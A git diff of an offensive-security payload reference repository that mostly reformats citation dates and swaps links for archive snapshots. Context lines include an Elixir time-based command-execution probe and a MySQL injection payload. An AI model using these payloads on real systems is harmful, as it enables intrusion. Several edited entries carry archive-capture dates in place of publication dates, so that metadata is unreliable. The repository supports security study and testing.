 * [Hack The Box - Arkham - 0xRick - August 10, 2019](https://web.archive.org/web/20251125134359/https://0xrick.github.io/hack-the-box/arkham/)
 * [How I found a $1500 worth Deserialization vulnerability - Ashish Kunwar - August 28, 2018](https://web.archive.org/web/20250918030712/https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
 * [Jackson CVE-2019-12384: anatomy of a vulnerability class - Andrea Brancaleoni - July 22, 2019](https://web.archive.org/web/20190724143322/https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
-* [Jackson gadgets - Anatomy of a vulnerability - Andrea Brancaleoni - 22 Jul 2019](https://web.archive.org/web/20190724143322/https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
+* [Jackson gadgets - Anatomy of a vulnerability - Andrea Brancaleoni - July 22, 2019](https://web.archive.org/web/20190724143322/https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
 * [Jackson Polymorphic Deserialization - FasterXML - July 23, 2020](https://github.com/FasterXML/jackson-docs/wiki/JacksonPolymorphicDeserialization)
 * [Java Deserialization Cheat Sheet - Aleksei Tiurin - May 23, 2023](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
 * [Java Deserialization in ViewState - Haboob Team - December 23, 2020](https://web.archive.org/web/20250909154616/https://www.exploit-db.com/docs/48126)
--- a/Deserialization/Python.md
+++ b/Deserialization/Python.md
@@ -133,4 +133,4 @@ with open('exploit_unsafeloader.yml') as file:
 * [Python Yaml Deserialization - HackTricks - July 19, 2024](https://web.archive.org/web/20241216145404/https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization)
 * [PyYAML Documentation - PyYAML - April 29, 2006](https://web.archive.org/web/20260219140302/https://pyyaml.org/wiki/PyYAMLDocumentation)
 * [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13, 2021](https://web.archive.org/web/20250604032318/https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf)
-* [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
+* [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
--- a/Deserialization/Ruby.md
+++ b/Deserialization/Ruby.md
@@ -89,6 +89,6 @@ Universal gadget for ruby 2.x - 3.x.

 * [Ruby 2.X Universal RCE Deserialization Gadget Chain - Luke Jahnke - November 8, 2018](https://web.archive.org/web/20191128020715/https://www.elttam.com.au/blog/ruby-deserialization/)
 * [Universal RCE with Ruby YAML.load - Etienne Stalmans (@_staaldraad) - March 2, 2019](https://web.archive.org/web/20190302114631/https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
-* [Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab - 2024](https://web.archive.org/web/20190817140453/https://pentesterlab.com/exercises/ruby_ugadget/course)
+* [Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab - August 17, 2019](https://web.archive.org/web/20190817140453/https://pentesterlab.com/exercises/ruby_ugadget/course)
 * [Universal RCE with Ruby YAML.load (versions > 2.7) - Etienne Stalmans (@_staaldraad) - January 9, 2021](https://web.archive.org/web/20260201150417/https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/)
 * [Blind Remote Code Execution through YAML Deserialization - Colin McQueen - June 9, 2021](https://web.archive.org/web/20210610111705/https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/)
--- a/Interface/README.md
+++ b/Interface/README.md
@@ -38,5 +38,5 @@ Insecure Management Interface vulnerabilities arise when administrative interfac
 ## References

 * [CAPEC-121: Exploit Non-Production Interfaces - CAPEC - July 30, 2020](https://web.archive.org/web/20260116113320/https://capec.mitre.org/data/definitions/121.html)
-* [Exploiting Spring Boot Actuators - Michael Stepankin - Feb 25, 2019](https://web.archive.org/web/20250116045001/https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
+* [Exploiting Spring Boot Actuators - Michael Stepankin - February 25, 2019](https://web.archive.org/web/20250116045001/https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
 * [Springboot - Official Documentation - May 9, 2024](https://web.archive.org/web/20140725032126/http://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
--- a/Management/Mercurial.md
+++ b/Management/Mercurial.md
@@ -20,4 +20,4 @@

 ## References

-* [my-chemical-romance - siunam - Feb 13, 2023](https://web.archive.org/web/20250712102012/https://siunam321.github.io/ctf/LA-CTF-2023/Web/my-chemical-romance/)
+* [my-chemical-romance - siunam - February 13, 2023](https://web.archive.org/web/20250712102012/https://siunam321.github.io/ctf/LA-CTF-2023/Web/my-chemical-romance/)
--- a/Management/README.md
+++ b/Management/README.md
@@ -46,4 +46,4 @@ For example in Git, the exploitation technique doesn't require to list the conte

 ## References

-* [Hidden directories and files as a source of sensitive information about web application - Apr 30, 2017](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
+* [Hidden directories and files as a source of sensitive information about web application - bl4de - April 30, 2017](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
--- a/Token/README.md
+++ b/Token/README.md
@@ -534,7 +534,7 @@ You should create your own key pair for this attack and host it. It should look
 - [JSON Web Token Validation Bypass in Auth0 Authentication API - Ben Knight - April 16, 2020](https://web.archive.org/web/20230104231143/https://insomniasec.com/blog/auth0-jwt-validation-bypass)
 - [JSON Web Token Vulnerabilities - 0xn3va - March 27, 2022](https://web.archive.org/web/20260305090633/https://0xn3va.gitbook.io/cheat-sheets/web-application/json-web-token-vulnerabilities)
 - [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8, 2017](https://web.archive.org/web/20190405023824/https://trustfoundry.net/jwt-hacking-101/)
- [Learn how to use JSON Web Tokens (JWT) for Authentication - @dwylhq - May 3, 2022](https://github.com/dwyl/learn-json-web-tokens)
+- [Learn how to use JSON Web Tokens (JWT) for Authentication - dwyl - May 3, 2022](https://github.com/dwyl/learn-json-web-tokens)
 - [Privilege Escalation like a Boss - janijay007 - October 27, 2018](https://web.archive.org/web/20190723093831/https://blog.securitybreached.org/2018/10/27/privilege-escalation-like-a-boss/)
 - [Simple JWT hacking - Hari Prasanth (@b1ack_h00d) - March 7, 2019](https://web.archive.org/web/20200724145838/https://medium.com/@blackhood/simple-jwt-hacking-73870a976750)
 - [WebSec CTF - Authorization Token - JWT Challenge - Kris Hunt - August 7, 2016](https://web.archive.org/web/20211025223311/https://ctf.rip/websec-ctf-authorization-token-jwt-challenge/)
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -165,7 +165,7 @@ end

 ## References

-* [[European Cyber Week] - AdmYSion - Alan Marrec (Maki)](https://www.maki.bzh/writeups/ecw2018admyssion/)
+* [[European Cyber Week] - AdmYSion - Alan Marrec (Maki) - January 14, 2025](https://web.archive.org/web/20250114083154/https://www.maki.bzh/writeups/ecw2018admyssion/)
 * [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN - October 31, 2018](https://web.archive.org/web/20200924103615/https://0xukn.fr/posts/writeupecw2018admyssion/)
 * [How To Configure OpenLDAP and Perform Administrative LDAP Tasks - Justin Ellingwood - May 30, 2015](https://web.archive.org/web/20260119175101/https://www.digitalocean.com/community/tutorials/how-to-configure-openldap-and-perform-administrative-ldap-tasks)
 * [How To Manage and Use LDAP Servers with OpenLDAP Utilities - Justin Ellingwood - May 29, 2015](https://web.archive.org/web/20160305121823/https://www.digitalocean.com/community/tutorials/how-to-manage-and-use-ldap-servers-with-openldap-utilities)
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -209,6 +209,6 @@ Examples of Indirect Prompt medium:
 * [Language Models are Few-Shot Learners - Tom B Brown - May 28, 2020](https://web.archive.org/web/20260306044348/https://arxiv.org/abs/2005.14165)
 * [Large Language Model Prompts (RTC0006) - HADESS/RedTeamRecipe - March 26, 2023](http://web.archive.org/web/20230529085349/https://redteamrecipe.com/Large-Language-Model-Prompts/)
 * [LLM Hacker's Handbook - Forces Unseen - March 7, 2023](https://doublespeak.chat/#/handbook)
-* [Prompt Injection Attacks for Dummies - Devansh Batham - Mar 2, 2025](https://web.archive.org/web/20250302143915/https://devanshbatham.hashnode.dev/prompt-injection-attacks-for-dummies)
+* [Prompt Injection Attacks for Dummies - Devansh Batham - March 2, 2025](https://web.archive.org/web/20250302143915/https://devanshbatham.hashnode.dev/prompt-injection-attacks-for-dummies)
 * [The AI Attack Surface Map v1.0 - Daniel Miessler - May 15, 2023](https://web.archive.org/web/20251212164354/https://danielmiessler.com/blog/the-ai-attack-surface-map-v1-0)
 * [You shall not pass: the spells behind Gandalf - Max Mathys and Václav Volhejn - June 2, 2023](https://web.archive.org/web/20230605141849/https://www.lakera.ai/insights/who-is-gandalf)
--- a/Injection/MySQL
+++ b/Injection/MySQL
@@ -767,7 +767,7 @@ Therefore, by using the payload `?id=1%df' and 1=1 --+`, after PHP adds the back
 * [Alternative for Information_Schema.Tables in MySQL - Osanda Malith Jayathissa - February 3, 2017](https://web.archive.org/web/20260227032450/https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
 * [Ekoparty CTF 2016 (Web 100) - p4-team - October 26, 2016](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100)
 * [Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - February 15, 2021](https://web.archive.org/web/20210215172533/https://sqlwiki.netspi.com/injectionTypes/errorBased/)
-* [How to Use SQL Calls to Secure Your Web Site - IPA ISEC - March 2010](https://web.archive.org/web/20240118024024/https://www.ipa.go.jp/security/vuln/ps6vr70000011hc4-att/000017321.pdf)
+* [How to Use SQL Calls to Secure Your Web Site - IPA ISEC - January 18, 2024](https://web.archive.org/web/20240118024024/https://www.ipa.go.jp/security/vuln/ps6vr70000011hc4-att/000017321.pdf)
 * [MySQL Out of Band Hacking - Osanda Malith Jayathissa - February 23, 2018](https://web.archive.org/web/20260303030701/https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)
 * [SQL injection - The oldschool way - 02 - Ahmed Sultan - January 1, 2025](https://web.archive.org/web/20250807062504/https://www.youtube.com/watch?si=kFQkvCEn2NiWLDGY&v=u91EdO1cDak&feature=youtu.be)
 * [SQL Truncation Attack - Rohit Shaw - June 29, 2014](https://web.archive.org/web/20201001181524/https://resources.infosecinstitute.com/sql-truncation-attack/)
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -592,5 +592,5 @@ Bypass using keywords case insensitive or an equivalent operator.
 * [PentestMonkey's mySQL injection cheat sheet - @pentestmonkey - August 15, 2011](https://web.archive.org/web/20260109024910/https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
 * [SQLi Cheatsheet - NetSparker - March 19, 2022](https://web.archive.org/web/20220219223426/https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
 * [SQLi in INSERT worse than SELECT - Mathias Karlsson - February 14, 2017](https://web.archive.org/web/20231004093323/https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
-* [SQLi Optimization and Obfuscation Techniques - Roberto Salgado - 2013](https://web.archive.org/web/20221005232819/https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf)
+* [SQLi Optimization and Obfuscation Techniques - Roberto Salgado - July 31, 2013](https://web.archive.org/web/20221005232819/https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf)
 * [The SQL Injection Knowledge base - Roberto Salgado - May 29, 2013](https://web.archive.org/web/20260302110304/https://www.websec.ca/kb/sql_injection)
--- a/Injection/Elixir.md
+++ b/Injection/Elixir.md
@@ -63,4 +63,4 @@ elem(System.shell("id && sleep 5"), 0) # Time-Based RCE

 ## References

- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
--- a/Injection/Java.md
+++ b/Injection/Java.md
@@ -509,7 +509,7 @@ Time-Based:

 ## References

- [Bean Stalking: Growing Java beans into RCE - Alvaro Munoz - July 7, 2020](https://securitylab.github.com/research/bean-validation-RCE)
+- [Bean Stalking: Growing Java beans into RCE - Alvaro Munoz - July 7, 2020](https://web.archive.org/web/20200707130000/https://securitylab.github.com/research/bean-validation-RCE)
 - [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Peter M (@pmnh_) - December 4, 2022](https://web.archive.org/web/20230203103413/https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/)
 - [Expression Language Injection - OWASP - December 4, 2019](https://web.archive.org/web/20200422030628/https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection)
 - [Expression Language injection - PortSwigger - January 27, 2019](https://web.archive.org/web/20251215015718/https://portswigger.net/kb/issues/00100f20_expression-language-injection)
@@ -522,4 +522,4 @@ Time-Based:
 - [Server-Side Template Injection: RCE For The Modern Web App (PDF) - James Kettle (@albinowax) - August 8, 2015](https://web.archive.org/web/20150808084830/https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
 - [Server-Side Template Injection: RCE For The Modern Web App (Video) - James Kettle (@albinowax) - December 28, 2015](https://web.archive.org/web/20200501162014/https://www.youtube.com/watch?v=3cT0uE7Y87s)
 - [VelocityServlet Expression Language injection - MagicBlue - November 15, 2017](https://web.archive.org/web/20220412162651/https://magicbluech.github.io/2017/11/15/VelocityServlet-Expression-language-Injection/)
- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
--- a/Injection/JavaScript.md
+++ b/Injection/JavaScript.md
@@ -169,4 +169,4 @@ ${= _.VERSION}

 - [Exploiting Less.js to Achieve RCE - Jeremy Buis - July 1, 2021](https://web.archive.org/web/20210706135910/https://www.softwaresecured.com/exploiting-less-js/)
 - [Handlebars template injection and RCE in a Shopify app - Mahmoud Gamal - April 4, 2019](https://web.archive.org/web/20260207143828/https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
--- a/Injection/PHP.md
+++ b/Injection/PHP.md
@@ -342,5 +342,5 @@ layout template:
 ## References

 - [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - Brumens - March 24, 2025](https://web.archive.org/web/20240906203847/https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
- [Server Side Template Injection (SSTI) via Twig escape handler - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58)
- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
+- [Server Side Template Injection (SSTI) via Twig escape handler - Grav - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58)
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
--- a/Injection/Python.md
+++ b/Injection/Python.md
@@ -463,4 +463,4 @@ Reference and explanation of payload can be found [yeswehack/server-side-templat
 - [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - Brumens - March 24, 2025](https://web.archive.org/web/20240906203847/https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
 - [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://web.archive.org/web/20210826203322/https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
 - [The minefield between syntaxes: exploiting syntax confusions in the wild - Brumens - October 17, 2025](https://web.archive.org/web/20251006113218/https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits)
- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -220,7 +220,7 @@ Once the template engine is identified, the attacker injects more complex expres

 - [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://web.archive.org/web/20160311193057/https://portswigger.net/knowledgebase/papers/ServerSideTemplateInjection.pdf)
 - [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://web.archive.org/web/20231210014226/https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf)
- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
 - [A Pentester's Guide to Server Side Template Injection (SSTI) - Busra Demir - December 24, 2020](https://web.archive.org/web/20260111213449/https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
 - [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - August 22, 2018](https://web.archive.org/web/20180928123607/https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
 - [Template Engines Injection 101 - Mahmoud M. Awali - November 1, 2024](https://web.archive.org/web/20251104003639/https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
--- a/Injection/Ruby.md
+++ b/Injection/Ruby.md
@@ -88,4 +88,4 @@ Execute code using SSTI for **Slim** engine.
 ## References

 - [Ruby ERB Template Injection - Scott White & Geoff Walton - September 13, 2017](https://web.archive.org/web/20181119170413/https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
--- a/Files/README.md
+++ b/Files/README.md
@@ -392,22 +392,22 @@ More payloads in the folder `CVE FFmpeg HLS/`.

 ## References

-* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella - 28 Feb 2023](https://web.archive.org/web/20230228140105/https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
+* [A New Vector For “Dirty” Arbitrary File Write to RCE - Maxence Schmitt and Lorenzo Stella - February 28, 2023](https://web.archive.org/web/20230228140105/https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
 * [Analysis of Python's .pth files as a persistence mechanism - @malmoeb - January 14, 2025](https://web.archive.org/web/20250218083206/https://dfir.ch/posts/publish_python_pth_extension/)
-* [Arbitrary File Upload Tricks In Java - pyn3rd - 2022-05-07](https://web.archive.org/web/20220601101409/https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/)
+* [Arbitrary File Upload Tricks In Java - pyn3rd - May 7, 2022](https://web.archive.org/web/20220601101409/https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/)
 * [Attacking Webservers Via .htaccess - Eldar Marcussen - May 17, 2011](https://web.archive.org/web/20200203171034/https://www.justanotherhacker.com:80/2011/05/htaccess-based-attacks.html)
 * [BookFresh Tricky File Upload Bypass to RCE - Ahmed Aboul-Ela - November 29, 2014](http://web.archive.org/web/20141231210005/https://secgeek.net/bookfresh-vulnerability/)
 * [Bulletproof Jpegs Generator - Damien Cauquil (@virtualabs) - April 9, 2012](https://web.archive.org/web/20130606125954/http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l)
-* [Encoding Web Shells in PNG IDAT chunks - phil - 04-06-2012](https://web.archive.org/web/20120610205435/http://www.idontplaydarts.com:80/2012/06/encoding-web-shells-in-png-idat-chunks)
-* [File Upload - HackTricks - 20/7/2024](https://web.archive.org/web/20241230150546/https://book.hacktricks.xyz/pentesting-web/file-upload)
+* [Encoding Web Shells in PNG IDAT chunks - phil - April 6, 2012](https://web.archive.org/web/20120610205435/http://www.idontplaydarts.com:80/2012/06/encoding-web-shells-in-png-idat-chunks)
+* [File Upload - HackTricks - July 20, 2024](https://web.archive.org/web/20241230150546/https://book.hacktricks.xyz/pentesting-web/file-upload)
 * [File Upload and PHP on IIS: >=? and <=* and "=. - Soroush Dalili (@irsdl) - July 23, 2014](https://web.archive.org/web/20231003035528/https://soroush.me/blog/2014/07/file-upload-and-php-on-iis-wildcards/)
 * [File Upload restrictions bypass - Haboob Team - July 24, 2018](https://web.archive.org/web/20180724174319/https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf)
-* [IIS - SOAP - Navigating The Shadows - 0xbad53c - 19/5/2024](https://web.archive.org/web/20220404084558/https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
-* [Injection points in popular image formats - Daniel Kalinowski‌‌ - Nov 8, 2019](https://web.archive.org/web/20191130061135/https://blog.isec.pl/injection-points-in-popular-image-formats/)
+* [IIS - SOAP - Navigating The Shadows - 0xbad53c - May 19, 2024](https://web.archive.org/web/20220404084558/https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
+* [Injection points in popular image formats - Daniel Kalinowski‌‌ - November 8, 2019](https://web.archive.org/web/20191130061135/https://blog.isec.pl/injection-points-in-popular-image-formats/)
 * [Insomnihack Teaser 2019 / l33t-hoster - Ian Bouchard (@Corb3nik) - January 20, 2019](https://web.archive.org/web/20190125123231/http://corb3nik.github.io:80/blog/insomnihack-teaser-2019/l33t-hoster)
 * [Inyección de código en imágenes subidas y tratadas con PHP-GD - hackplayers - March 22, 2020](https://web.archive.org/web/20260219153035/https://www.hackplayers.com/2020/03/inyeccion-de-codigo-en-imagenes-php-gd.html)
-* [La PNG qui se prenait pour du PHP - Philippe Paget (@PagetPhil) - February, 23 2014](https://web.archive.org/web/20140416083530/http://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/)
-* [More Ghostscript Issues: Should we disable PS coders in policy.xml by default? - Tavis Ormandy - 21 Aug 2018](https://web.archive.org/web/20180821130209/http://openwall.com/lists/oss-security/2018/08/21/2)
+* [La PNG qui se prenait pour du PHP - Philippe Paget (@PagetPhil) - February 23, 2014](https://web.archive.org/web/20140416083530/http://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/)
+* [More Ghostscript Issues: Should we disable PS coders in policy.xml by default? - Tavis Ormandy - August 21, 2018](https://web.archive.org/web/20180821130209/http://openwall.com/lists/oss-security/2018/08/21/2)
 * [PHDays - Attacks on video converters:a year later - Emil Lerner, Pavel Cheremushkin - December 20, 2017](https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit#slide=id.p)
 * [Protection from Unrestricted File Upload Vulnerability - Narendra Shinde - October 22, 2015](https://web.archive.org/web/20200812181326/https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
 * [The .phpt File Structure - PHP Internals Book - October 18, 2017](https://web.archive.org/web/20260218185252/https://www.phpinternalsbook.com/tests/phpt_file_structure.html)
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -578,7 +578,7 @@ Use browsers quirks to recreate some HTML tags.
 - [Frans Rosén on how he got Bug Bounty for Mega.co.nz XSS - Frans Rosén - February 14, 2013](https://web.archive.org/web/20231004090825/https://labs.detectify.com/2013/02/14/how-i-got-the-bug-bounty-for-mega-co-nz-xss/)
 - [Google XSS Turkey - Frans Rosén - June 6, 2015](https://web.archive.org/web/20231004100309/https://labs.detectify.com/2015/06/06/google-xss-turkey/)
 - [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf) - Marin Moulinier - March 9, 2017](https://web.archive.org/web/20260304011652/https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff)
- [Killing a bounty program, Twice - Itzhak (Zuk) Avraham and Nir Goldshlager - May 2012](https://web.archive.org/web/20140926052901/http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf)
+- [Killing a bounty program, Twice - Itzhak (Zuk) Avraham and Nir Goldshlager - September 26, 2014](https://web.archive.org/web/20140926052901/http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf)
 - [Mutation XSS in Google Search -  Tomasz Andrzej Nidecki - April 10, 2019](https://web.archive.org/web/20260305093221/https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/)
 - [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang - September 26, 2013](https://web.archive.org/web/20250901044759/https://cure53.de/fp170.pdf)
 - [postMessage XSS on a million sites - Mathias Karlsson - December 15, 2016](https://web.archive.org/web/20231004103135/https://labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/)
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -672,8 +672,8 @@ When all you control is the DTD file, and you do not control the `xml` file, XXE
 - [How we got read access on Google’s production servers - Detectify - April 11, 2014](https://web.archive.org/web/20230902033341/https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/)
 - [Impossible XXE in PHP - Aleksandr Zhurnakov - March 11, 2025](https://web.archive.org/web/20260131091306/https://swarm.ptsecurity.com/impossible-xxe-in-php/)
 - [Midnight Sun CTF 2019 Quals - Rubenscube - jbz - April 6, 2019](https://web.archive.org/web/20260302041500/https://jbz.team/midnightsunctfquals2019/Rubenscube)
- [OOB XXE through SAML - Sean Melia (@seanmeals) - January 2016](https://web.archive.org/web/20170205151900/https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf)
- [Payloads for Cisco and Citrix - Arseniy Sharoglazov - January 1, 2016](https://web.archive.org/web/20181213212434/https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
+- [OOB XXE through SAML - Sean Melia (@seanmeals) - February 5, 2017](https://web.archive.org/web/20170205151900/https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf)
+- [Payloads for Cisco and Citrix - Arseniy Sharoglazov - December 13, 2018](https://web.archive.org/web/20181213212434/https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
 - [Pentest XXE - @phonexicum - March 9, 2020](https://web.archive.org/web/20260306152955/https://phonexicum.github.io/infosec/xxe.html)
 - [Playing with Content-Type – XXE on JSON Endpoints - Antti Rantasaari - April 20, 2015](https://web.archive.org/web/20240615071332/https://www.netspi.com/blog/technical-blog/web-application-pentesting/playing-content-type-xxe-json-endpoints/)
 - [REDTEAM TALES 0X1: SOAPY XXE - Uncover and exploit XXE vulnerability in SOAP WS - Optistream - May 27, 2024](https://web.archive.org/web/20240527202144/https://www.optistream.io/blogs/tech/redteam-stories-1-soapy-xxe)
--- a/Slip/README.md
+++ b/Slip/README.md
@@ -44,5 +44,5 @@ For a list of affected libraries and projects, visit [snyk/zip-slip-vulnerabilit

 ## References

-* [Zip Slip - Snyk - June 5, 2018](https://github.com/snyk/zip-slip-vulnerability)
+* [Zip Slip - Snyk - June 5, 2018](https://web.archive.org/web/20260307012319/https://github.com/snyk/zip-slip-vulnerability)
 * [Zip Slip Vulnerability - Snyk - April 15, 2018](https://web.archive.org/web/20180605125813/https://snyk.io/research/zip-slip-vulnerability)
--- a/_template_vuln/README.md
+++ b/_template_vuln/README.md
@@ -36,4 +36,4 @@ Exploit

 ## References

-* [Blog title - Author (@handle) - Month XX, 202X](https://web.archive.org/web/20020120142510/http://example.com:80/)
+* [Blog title - Author (@handle) - January 1, 2024](https://web.archive.org/web/20020120142510/http://example.com:80/)